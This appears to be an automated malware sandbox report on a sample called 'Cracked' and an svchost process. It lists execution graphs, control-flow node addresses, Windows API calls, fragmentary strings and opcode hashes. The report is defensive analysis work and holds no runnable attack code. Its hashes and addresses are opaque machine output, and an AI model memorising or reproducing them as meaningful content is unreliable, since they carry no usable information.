                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 91143d24073065a2d1897b14b6ba323e7520535a0809870aa3bcd1439251307b
                                                    • Instruction ID: e2be7f1a5fe3a5f0dc1fdb3590d3b00f6a2c38a47a071d4ccb0c929ffea0453e
                                                    • Opcode Fuzzy Hash: 91143d24073065a2d1897b14b6ba323e7520535a0809870aa3bcd1439251307b
                                                    • Instruction Fuzzy Hash: 6541D631D1DA095EE71CFB3498861FA73E1EFA5351F44447ED447C399AEE38B4068681

                                                    Execution Graph

                                                    Execution Coverage:15.3%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:87
                                                    Total number of Limit Nodes:0
                                                    execution_graph 23690 5c15320 23691 5c15366 KiUserCallbackDispatcher 23690->23691 23693 5c153b9 23691->23693 23694 5c10b20 23695 5c10b42 LdrInitializeThunk 23694->23695 23697 5c10b7c 23695->23697 23698 52309c8 23699 52309e3 23698->23699 23703 5237570 23699->23703 23717 52375ce 23699->23717 23700 5230a35 23704 523759f 23703->23704 23705 52375ea 23704->23705 23731 5237e6d 23704->23731 23736 5237ece 23704->23736 23741 5237f08 23704->23741 23746 5237e8a 23704->23746 23751 5237eeb 23704->23751 23756 5237ea7 23704->23756 23761 5237e20 23704->23761 23766 5237f58 23704->23766 23771 5237f3b 23704->23771 23776 5237e50 23704->23776 23781 5237e11 23704->23781 23705->23700 23718 52375d9 23717->23718 23719 5237e20 2 API calls 23718->23719 23720 5237ea7 2 API calls 23718->23720 23721 52375ea 23718->23721 23722 5237eeb 2 API calls 23718->23722 23723 5237e8a 2 API calls 23718->23723 23724 5237f08 2 API calls 23718->23724 23725 5237ece 2 API calls 23718->23725 23726 5237e6d 2 API calls 23718->23726 23727 5237e11 2 API calls 23718->23727 23728 5237e50 2 API calls 23718->23728 23729 5237f3b 2 API calls 23718->23729 23730 5237f58 2 API calls 23718->23730 23719->23721 23720->23721 23721->23700 23722->23721 23723->23721 23724->23721 23725->23721 23726->23721 23727->23721 23728->23721 23729->23721 23730->23721 23732 5237e72 23731->23732 23733 5237f73 23732->23733 23786 5c10a6a 23732->23786 23790 5c10a7c 23732->23790 23733->23705 23737 5237ed3 23736->23737 23738 5237f73 23737->23738 23739 5c10a6a KiUserExceptionDispatcher 23737->23739 23740 5c10a7c KiUserExceptionDispatcher 23737->23740 23738->23705 23739->23738 23740->23738 23742 5237f0d 23741->23742 23743 5237f73 23742->23743 23744 5c10a6a KiUserExceptionDispatcher 23742->23744 23745 5c10a7c KiUserExceptionDispatcher 23742->23745 23743->23705 23744->23743 23745->23743 23747 5237e8f 23746->23747 23748 5237f73 23747->23748 23749 5c10a6a KiUserExceptionDispatcher 23747->23749 23750 5c10a7c KiUserExceptionDispatcher 23747->23750 23748->23705 23749->23748 23750->23748 23752 5237ef0 23751->23752 23753 5237f73 23752->23753 23754 5c10a6a KiUserExceptionDispatcher 23752->23754 23755 5c10a7c KiUserExceptionDispatcher 23752->23755 23753->23705 23754->23753 23755->23753 23757 5237eac 23756->23757 23758 5237f73 23757->23758 23759 5c10a6a KiUserExceptionDispatcher 23757->23759 23760 5c10a7c KiUserExceptionDispatcher 23757->23760 23758->23705 23759->23758 23760->23758 23762 5237e46 23761->23762 23763 5237f73 23762->23763 23764 5c10a6a KiUserExceptionDispatcher 23762->23764 23765 5c10a7c KiUserExceptionDispatcher 23762->23765 23763->23705 23764->23763 23765->23763 23767 5237f5d 23766->23767 23768 5237f73 23767->23768 23769 5c10a6a KiUserExceptionDispatcher 23767->23769 23770 5c10a7c KiUserExceptionDispatcher 23767->23770 23768->23705 23769->23768 23770->23768 23772 5237f40 23771->23772 23773 5237f73 23772->23773 23774 5c10a6a KiUserExceptionDispatcher 23772->23774 23775 5c10a7c KiUserExceptionDispatcher 23772->23775 23773->23705 23774->23773 23775->23773 23777 5237e55 23776->23777 23778 5237f73 23777->23778 23779 5c10a6a KiUserExceptionDispatcher 23777->23779 23780 5c10a7c KiUserExceptionDispatcher 23777->23780 23778->23705 23779->23778 23780->23778 23782 5237e46 23781->23782 23783 5237f73 23782->23783 23784 5c10a6a KiUserExceptionDispatcher 23782->23784 23785 5c10a7c KiUserExceptionDispatcher 23782->23785 23783->23705 23784->23783 23785->23783 23787 5c10a7d 23786->23787 23788 5c10a82 KiUserExceptionDispatcher 23787->23788 23789 5c10a95 23787->23789 23788->23787 23789->23733 23791 5c10a7d 23790->23791 23792 5c10a82 KiUserExceptionDispatcher 23791->23792 23793 5c10a95 23791->23793 23792->23791 23793->23733

                                                    Executed Functions

                                                    Function 05C10B20 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 735 5c10b20-5c10b75 LdrInitializeThunk 739 5c10b7c-5c10b83 735->739 740 5c10b85-5c10bb9 739->740 741 5c10bcb-5c10be4 739->741 740->741 750 5c10bbb-5c10bc5 740->750 743 5c10be6 741->743 744 5c10bef 741->744 743->744 746 5c10bf0 744->746 746->746 750->741
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4530992819.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5c10000_svchost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8d74147217c662bb2f90bf51523ff776e0c53567895deebb9e7939d5de99697c
                                                    • Instruction ID: 2cb1c4348fdff1954b5dc16f73ebc4a999c5e535a592c7122c71bf2ea02625d1
                                                    • Opcode Fuzzy Hash: 8d74147217c662bb2f90bf51523ff776e0c53567895deebb9e7939d5de99697c
                                                    • Instruction Fuzzy Hash: DA215C317112149FC719EB28C5697AE37F2AF89749F200479C406A7398DF759D82CBD1
                                                    Function 05235AA8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 752 5235aa8-5235b0e 754 5235b10-5235b1b 752->754 755 5235b58-5235b5a 752->755 754->755 756 5235b1d-5235b29 754->756 757 5235b5c-5235b75 755->757 758 5235b2b-5235b35 756->758 759 5235b4c-5235b56 756->759 763 5235bc1-5235bc3 757->763 764 5235b77-5235b83 757->764 760 5235b37 758->760 761 5235b39-5235b48 758->761 759->757 760->761 761->761 765 5235b4a 761->765 767 5235bc5-5235c1d 763->767 764->763 766 5235b85-5235b91 764->766 765->759 768 5235b93-5235b9d 766->768 769 5235bb4-5235bbf 766->769 776 5235c67-5235c69 767->776 777 5235c1f-5235c2a 767->777 770 5235ba1-5235bb0 768->770 771 5235b9f 768->771 769->767 770->770 773 5235bb2 770->773 771->770 773->769 779 5235c6b-5235c83 776->779 777->776 778 5235c2c-5235c38 777->778 780 5235c5b-5235c65 778->780 781 5235c3a-5235c44 778->781 786 5235c85-5235c90 779->786 787 5235ccd-5235ccf 779->787 780->779 782 5235c46 781->782 783 5235c48-5235c57 781->783 782->783 783->783 785 5235c59 783->785 785->780 786->787 789 5235c92-5235c9e 786->789 788 5235cd1-5235d36 787->788 798 5235d38-5235d3e 788->798 799 5235d3f-5235d5f 788->799 790 5235cc1-5235ccb 789->790 791 5235ca0-5235caa 789->791 790->788 793 5235cae-5235cbd 791->793 794 5235cac 791->794 793->793 795 5235cbf 793->795 794->793 795->790 798->799 803 5235d69-5235d9f 799->803 806 5235da1-5235da5 803->806 807 5235daf-5235db3 803->807 806->807 808 5235da7 806->808 809 5235dc3-5235dc7 807->809 810 5235db5-5235db9 807->810 808->807 811 5235dd7-5235ddb 809->811 812 5235dc9-5235dcd 809->812 810->809 813 5235dbb 810->813 815 5235deb-5235def 811->815 816 5235ddd-5235de1 811->816 812->811 814 5235dcf-5235dd2 call 5230d6c 812->814 813->809 814->811 819 5235df1-5235df5 815->819 820 5235dff-5235e03 815->820 816->815 818 5235de3-5235de6 call 5230d6c 816->818 818->815 819->820 822 5235df7-5235dfa call 5230d6c 819->822 823 5235e13-5235e17 820->823 824 5235e05-5235e09 820->824 822->820 825 5235e27 823->825 826 5235e19-5235e1d 823->826 824->823 828 5235e0b 824->828 830 5235e28 825->830 826->825 829 5235e1f 826->829 828->823 829->825 830->830
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \Vl
                                                    • API String ID: 0-682378881
                                                    • Opcode ID: 7267bad2baf4d69e934bb29fd5938e913818aa0299dfb6200443369b52c343b3
                                                    • Instruction ID: 09a695d8640e9f991486d63c75b975d6fbd30287ab18f983f0e4c54de58d2035
                                                    • Opcode Fuzzy Hash: 7267bad2baf4d69e934bb29fd5938e913818aa0299dfb6200443369b52c343b3
                                                    • Instruction Fuzzy Hash: D8B15FB1F1020A9FDF14CFA9C9867ADBBF2BF88304F148529D41DA7254EB749846CB81
                                                    Function 05236378 Relevance: .3, Instructions: 266COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e4e243464614e95fa68850a1a7d8e79ab7c53e5357fb01c741078e5ccca8107
                                                    • Instruction ID: d607cdeadf164fa63ba6053e3f7eddb29c849c762bc69c9f29b10b1cae944463
                                                    • Opcode Fuzzy Hash: 6e4e243464614e95fa68850a1a7d8e79ab7c53e5357fb01c741078e5ccca8107
                                                    • Instruction Fuzzy Hash: 3FB160B0E1020AAFDF10CFA9C9867ADBBF6BF48354F148139D419A7254EB74A845CF81
                                                    Function 05C15311 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 49 5c15311-5c15318 50 5c15388 49->50 51 5c1531a-5c1537f 49->51 53 5c15389-5c153b7 KiUserCallbackDispatcher 50->53 51->50 55 5c153c0-5c153e6 53->55 56 5c153b9-5c153bf 53->56 56->55
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(00000050), ref: 05C153A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4530992819.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5c10000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID: 4']q
                                                    • API String ID: 2492992576-1259897404
                                                    • Opcode ID: 414cf536873775b5071714acb1807a55775e4bff24f50551233c7e19067ce0fc
                                                    • Instruction ID: db4a9ddc10341ef73d3085e8ccae4f61b7b2ed48c482b72783f517b228086b7a
                                                    • Opcode Fuzzy Hash: 414cf536873775b5071714acb1807a55775e4bff24f50551233c7e19067ce0fc
                                                    • Instruction Fuzzy Hash: 9E2178B1804249CFCB04DFA9E4456EEBFB8FB48310F14855AE819B3380C7786944CFA5
                                                    Function 05C15320 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 61 5c15320-5c153b7 KiUserCallbackDispatcher 67 5c153c0-5c153e6 61->67 68 5c153b9-5c153bf 61->68 68->67
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(00000050), ref: 05C153A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4530992819.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5c10000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID: 4']q
                                                    • API String ID: 2492992576-1259897404
                                                    • Opcode ID: 2f8d138998caab1d10abc5de7eb34df332bf7ccd12b2b46589ff4babbf84f567
                                                    • Instruction ID: a20179545d746f64b9a3170a968355c0dc0028a2d1693cc536e91c7e11f55a38
                                                    • Opcode Fuzzy Hash: 2f8d138998caab1d10abc5de7eb34df332bf7ccd12b2b46589ff4babbf84f567
                                                    • Instruction Fuzzy Hash: 4B2138B59042498FCB04DFA9E4456EEBBB8FB48310F10855AD819B3380C7786944CFA5
                                                    Function 05236D88 Relevance: 2.7, Strings: 2, Instructions: 230COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 71 5236d88-5236d9e 72 5236da4-5236da6 71->72 73 5236edc-5236f01 71->73 74 5236f08-5236f53 72->74 75 5236dac-5236dba 72->75 73->74 99 5236fb5-5236fba 74->99 100 5236f55-5236f5e 74->100 80 5236ded-5236dfb 75->80 81 5236dbc-5236dc4 75->81 87 5236e42-5236e50 80->87 88 5236dfd-5236e05 80->88 82 5236dd2-5236dea 81->82 83 5236dc6-5236dc8 81->83 83->82 96 5236e52-5236e5a 87->96 97 5236e97-5236e9f 87->97 91 5236e13-5236e3f 88->91 92 5236e07-5236e09 88->92 92->91 103 5236e68-5236e94 96->103 104 5236e5c-5236e5e 96->104 101 5236ea1-5236ea3 97->101 102 5236ead-5236ed9 97->102 105 5236f60-5236f63 100->105 106 5236fab-5236faf 100->106 101->102 104->103 108 5236f65-5236f72 105->108 109 5236fbb-5237005 105->109 106->99 110 5236f82-5236f8a 108->110 111 5236f74-5236f80 108->111 117 5236f8f-5236f9f 110->117 111->110 122 5236fa0-5236fa9 111->122 122->105 122->106
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq$(aq
                                                    • API String ID: 0-3916115647
                                                    • Opcode ID: 0078b768a2b2f643a92fdff52a894f3f513c43d7a1051ec713522e442901b759
                                                    • Instruction ID: 6d116ab72083d36c84bf14d12db49622136df6af9236bf08084a3582fc42d24a
                                                    • Opcode Fuzzy Hash: 0078b768a2b2f643a92fdff52a894f3f513c43d7a1051ec713522e442901b759
                                                    • Instruction Fuzzy Hash: 1471E4717182015FCB19DF6DD99096ABBEAEFC525071484BAD80ACB39ADE31EC06C790
                                                    Function 052360E4 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 178 52360e4-523617c 181 52361c6-52361c8 178->181 182 523617e-5236189 178->182 183 52361ca-52361e2 181->183 182->181 184 523618b-5236197 182->184 190 52361e4-52361ef 183->190 191 523622c-523622e 183->191 185 52361ba-52361c4 184->185 186 5236199-52361a3 184->186 185->183 188 52361a7-52361b6 186->188 189 52361a5 186->189 188->188 192 52361b8 188->192 189->188 190->191 193 52361f1-52361fd 190->193 194 5236230-5236242 191->194 192->185 195 5236220-523622a 193->195 196 52361ff-5236209 193->196 201 5236249-5236275 194->201 195->194 197 523620b 196->197 198 523620d-523621c 196->198 197->198 198->198 200 523621e 198->200 200->195 202 523627b-5236289 201->202 203 5236292-52362a0 202->203 204 523628b-5236291 202->204 207 52362a8-52362b2 203->207 204->203 208 52362bc-52362ef 207->208 211 52362f1-52362f5 208->211 212 52362ff-5236303 208->212 211->212 215 52362f7-52362fa call 5230d6c 211->215 213 5236313-5236317 212->213 214 5236305-5236309 212->214 217 5236327-523632b 213->217 218 5236319-523631d 213->218 214->213 216 523630b-523630e call 5230d6c 214->216 215->212 216->213 222 523633b 217->222 223 523632d-5236331 217->223 218->217 221 523631f 218->221 221->217 225 523633c 222->225 223->222 224 5236333 223->224 224->222 225->225
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \Vl$\Vl
                                                    • API String ID: 0-415357090
                                                    • Opcode ID: 1a26e75846343588d086465f2b3e0ce9213cdd80fbd9411eb1110afbc7edc342
                                                    • Instruction ID: 238055b68768764dcd5f33432012132ed7c594b0d45927a155931bab9b546335
                                                    • Opcode Fuzzy Hash: 1a26e75846343588d086465f2b3e0ce9213cdd80fbd9411eb1110afbc7edc342
                                                    • Instruction Fuzzy Hash: 06716EB0E10209EFDF14CFA8C9467DDBBF6BF88704F148129D419A7254D774A842CB91
                                                    Function 052360F0 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 226 52360f0-523617c 229 52361c6-52361c8 226->229 230 523617e-5236189 226->230 231 52361ca-52361e2 229->231 230->229 232 523618b-5236197 230->232 238 52361e4-52361ef 231->238 239 523622c-523622e 231->239 233 52361ba-52361c4 232->233 234 5236199-52361a3 232->234 233->231 236 52361a7-52361b6 234->236 237 52361a5 234->237 236->236 240 52361b8 236->240 237->236 238->239 241 52361f1-52361fd 238->241 242 5236230-5236289 239->242 240->233 243 5236220-523622a 241->243 244 52361ff-5236209 241->244 251 5236292-52362b2 242->251 252 523628b-5236291 242->252 243->242 245 523620b 244->245 246 523620d-523621c 244->246 245->246 246->246 248 523621e 246->248 248->243 256 52362bc-52362ef 251->256 252->251 259 52362f1-52362f5 256->259 260 52362ff-5236303 256->260 259->260 263 52362f7-52362fa call 5230d6c 259->263 261 5236313-5236317 260->261 262 5236305-5236309 260->262 265 5236327-523632b 261->265 266 5236319-523631d 261->266 262->261 264 523630b-523630e call 5230d6c 262->264 263->260 264->261 270 523633b 265->270 271 523632d-5236331 265->271 266->265 269 523631f 266->269 269->265 273 523633c 270->273 271->270 272 5236333 271->272 272->270 273->273
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \Vl$\Vl
                                                    • API String ID: 0-415357090
                                                    • Opcode ID: f5942880ce9d3ec0473e32f52293cb246f9c650b3e6237d6a7e638176db72965
                                                    • Instruction ID: 7d022f56b3cfecb47ecb611880ba065cc5f9ea3499e4b6a2603d9a9b79daec79
                                                    • Opcode Fuzzy Hash: f5942880ce9d3ec0473e32f52293cb246f9c650b3e6237d6a7e638176db72965
                                                    • Instruction Fuzzy Hash: A4716EB0E10209EFDF14CFA9C94679EBBF6BF88714F148129D419A7354DB74A842CB91
                                                    Function 05231748 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 274 5231748-5231777 275 5231a22-5231a5d 274->275 276 523177d-52317ef call 5230c30 274->276 286 5231a7b-5231a83 275->286 287 5231a5f-5231a76 275->287 305 52317f5-523186c 276->305 289 5231aae-5231ab7 286->289 287->286 290 5231a85-5231a8e 289->290 291 5231ab9-5231abf 289->291 292 5231ac2-5231ad4 290->292 293 5231a90-5231a9e 290->293 300 5231ad6-5231b1e call 5230c6c 292->300 301 5231b54-5231ba7 call 5231bc8 292->301 293->292 295 5231aa0-5231aa4 293->295 297 5231aa6-5231aa8 295->297 298 5231aab 295->298 297->298 298->289 316 5231b24-5231b4c 300->316 328 5231bad-5231bc5 301->328 332 5231883-52318a7 305->332 333 523186e-5231881 305->333 316->301 334 52318ae-52318b2 332->334 333->334 336 52318b4 334->336 337 52318bd 334->337 336->337 337->275
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq$Te]q
                                                    • API String ID: 0-2961548996
                                                    • Opcode ID: 0035c18bf85cff71a72678e696f5b444c93ddc1d89567abd330470c9239846b2
                                                    • Instruction ID: 5b9232ea67dd97c53bbbeae01b2a6f4742417ffd0c98b9e78a8e1aa0c14f42ce
                                                    • Opcode Fuzzy Hash: 0035c18bf85cff71a72678e696f5b444c93ddc1d89567abd330470c9239846b2
                                                    • Instruction Fuzzy Hash: 92516C71B202149FC748DF69D459A9EBBF2BF88710F2180A9E806DB3A5DB74DC01CB90
                                                    Function 05237008 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 341 5237008-52370d8 call 5230e1c 354 52370da 341->354 355 52370dd-5237104 341->355 354->355 359 5237106 355->359 360 5237109-5237112 355->360 359->360 361 5237118-523718e call 5230c40 360->361 371 5237190 361->371 372 5237199 361->372 371->372
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te]q$dLcq
                                                    • API String ID: 0-1133975778
                                                    • Opcode ID: bfe416bf44ac012eeb557eed465044ab12d7cdacd345682c041f8cecb8639c57
                                                    • Instruction ID: 970056daae648d258890d546ce967f004d487ae33b287d72cb0b2a769c394549
                                                    • Opcode Fuzzy Hash: bfe416bf44ac012eeb557eed465044ab12d7cdacd345682c041f8cecb8639c57
                                                    • Instruction Fuzzy Hash: 7C5104B5B601149FCB48DF69C898AADBBF6FF88B10F1540A9E406DB375DA71EC018B40
                                                    Function 052315B0 Relevance: 2.6, Strings: 2, Instructions: 129COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 373 52315b0-52315d0 374 52315d2-52315dc 373->374 375 52315de 373->375 377 52315e3-52315e5 374->377 375->377 378 52316d0-523170c 377->378 379 52315eb-5231634 377->379 390 523172b 378->390 391 523170f-523172a 378->391 388 5231640-5231687 379->388 389 5231636-523163a 379->389 400 523168d-52316b1 388->400 389->388 406 523172c call 52318c0 390->406 407 523172c call 5231748 390->407 391->390 392 5231732-5231742 403 52316b3 400->403 404 52316bc-52316bd 400->404 403->404 404->378 406->392 407->392
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Haq$dLcq
                                                    • API String ID: 0-1713614415
                                                    • Opcode ID: 4ea05757d74e6c86f207eb33340ff21cf9dbf2ee4792043325aa823d8863ebb7
                                                    • Instruction ID: e33808679b366b7850d1e86ec58f0ce6d07cfc939017c83c5817b94ae39418fb
                                                    • Opcode Fuzzy Hash: 4ea05757d74e6c86f207eb33340ff21cf9dbf2ee4792043325aa823d8863ebb7
                                                    • Instruction Fuzzy Hash: 1D41A071B042059FCB199F69D454AAEBBF6FF89200F1485AAE006DB3A1CA74DC05CB91
                                                    Function 05238950 Relevance: 1.9, Strings: 1, Instructions: 665COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 408 5238950-5238977 410 5238981-52389af 408->410 411 5238979-5238980 408->411 415 52389b1-52389b8 call 52394ca 410->415 416 52389c6-52389d3 410->416 419 52389be-52389c4 415->419 417 52389d5-52389de 416->417 418 52389ff-5238a06 416->418 420 52389e0 417->420 421 5238a07-52394c0 417->421 419->415 419->416 571 52389e4 call 5238940 420->571 572 52389e4 call 5238950 420->572 573 52389e4 call 52389ec 420->573 422 52389ea-52389fd 422->417 422->418 571->422 572->422 573->422
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fbq
                                                    • API String ID: 0-3185938239
                                                    • Opcode ID: cf46295a9a177fa3d93f87b3d8276bc013b6b6a0239dfe263e6ec8b1cd9ba1d6
                                                    • Instruction ID: 007f1663a73640ef03c8870000c034a12f523caee9849f9955ca716ef1f99c31
                                                    • Opcode Fuzzy Hash: cf46295a9a177fa3d93f87b3d8276bc013b6b6a0239dfe263e6ec8b1cd9ba1d6
                                                    • Instruction Fuzzy Hash: 1252EE75A00309EFDB06ABB5E554B9D7B7BFF88300F104814E805237ADCB3A6856DB69
                                                    Function 0523CB78 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 574 523cb78-523cb99 575 523cba7-523cbab 574->575 576 523cb9b-523cb9f 574->576 577 523cbb1-523cbb4 575->577 578 523d20a 575->578 576->578 579 523cba5 576->579 580 523cbba-523cbc2 577->580 581 523d20f-523d214 577->581 578->581 579->577 582 523cbd2-523cbee call 523ca98 580->582 583 523cbc4-523cbc7 580->583 588 523d219-523d220 581->588 592 523cbf0-523cc06 call 523ca98 582->592 593 523cc6b-523cc97 call 523ca98 582->593 584 523cbcd 583->584 585 523cc9c-523ccc0 call 523ca98 583->585 584->588 596 523ccc2-523ccdb 585->596 597 523ccdd-523cceb 585->597 602 523cc38-523cc5d call 523ca98 592->602 603 523cc08-523cc0c 592->603 593->588 609 523cd15-523cd27 596->609 597->578 600 523ccf1-523ccf3 597->600 600->578 601 523ccf9-523ccfb 600->601 601->578 605 523cd01-523cd0d 601->605 624 523cc65-523cc69 602->624 603->602 606 523cc0e-523cc2e call 523ca98 603->606 605->609 626 523cc36 606->626 611 523cd39-523cd56 call 523ca98 609->611 612 523cd29 609->612 622 523cd58-523cd5c 611->622 623 523cd5e-523cd6d 611->623 612->588 617 523cd2f-523cd33 612->617 617->588 617->611 622->623 625 523cd70-523ce02 622->625 623->625 624->592 624->593 634 523ce05-523ce2d 625->634 626->624 634->581 637 523ce33-523ce51 634->637 638 523ce53 637->638 639 523ce5a-523ce63 637->639 640 523ceb5-523cec6 638->640 641 523ce55-523ce58 638->641 642 523ce65-523ce8b 639->642 643 523ce8d-523ceb3 639->643 644 523ced4-523ced8 640->644 645 523cec8-523cecc 640->645 641->639 641->640 651 523cef6-523ceff 642->651 643->651 644->578 649 523cede-523cee1 644->649 645->578 648 523ced2 645->648 648->649 649->581 650 523cee7-523ceef 649->650 650->651 651->581 652 523cf05-523cf1a 651->652 652->634 653 523cf20-523cf24 652->653 654 523cf26-523cf2a 653->654 655 523cf2c-523cf30 653->655 654->655 656 523cf40-523cf44 654->656 657 523d067-523d073 655->657 658 523cf36-523cf3a 655->658 659 523cf46-523cf4a 656->659 660 523cfa5-523cfa9 656->660 657->581 661 523d079-523d08a 657->661 658->656 658->657 659->660 664 523cf4c-523cf58 659->664 662 523d007-523d00b 660->662 663 523cfab-523cfaf 660->663 661->581 665 523d090-523d097 661->665 662->657 666 523d00d-523d011 662->666 663->662 667 523cfb1-523cfbd 663->667 664->581 668 523cf5e-523cf79 664->668 665->581 669 523d09d-523d0a4 665->669 666->657 670 523d013-523d01f 666->670 667->581 671 523cfc3-523cfde 667->671 668->581 678 523cf7f-523cf87 668->678 669->581 672 523d0aa-523d0b1 669->672 670->581 673 523d025-523d040 670->673 671->581 681 523cfe4-523cfec 671->681 672->581 675 523d0b7-523d0ca call 523ca98 672->675 673->581 685 523d046-523d04e 673->685 683 523d12a-523d12e 675->683 684 523d0cc-523d0d0 675->684 678->581 682 523cf8d-523cfa0 678->682 681->581 686 523cff2-523d005 681->686 682->657 690 523d130-523d134 683->690 691 523d18b-523d18f 683->691 684->683 688 523d0d2-523d0de 684->688 685->581 689 523d054-523d05f 685->689 686->657 688->581 692 523d0e4-523d10c 688->692 689->657 690->691 696 523d136-523d142 690->696 693 523d1e2-523d1f7 691->693 694 523d191-523d195 691->694 692->581 708 523d112-523d125 692->708 698 523d1f9 693->698 699 523d208 693->699 694->693 701 523d197-523d1a3 694->701 696->581 702 523d148-523d170 696->702 698->611 703 523d1ff-523d202 698->703 699->588 701->581 705 523d1a5-523d1cd 701->705 702->581 709 523d176-523d189 702->709 703->611 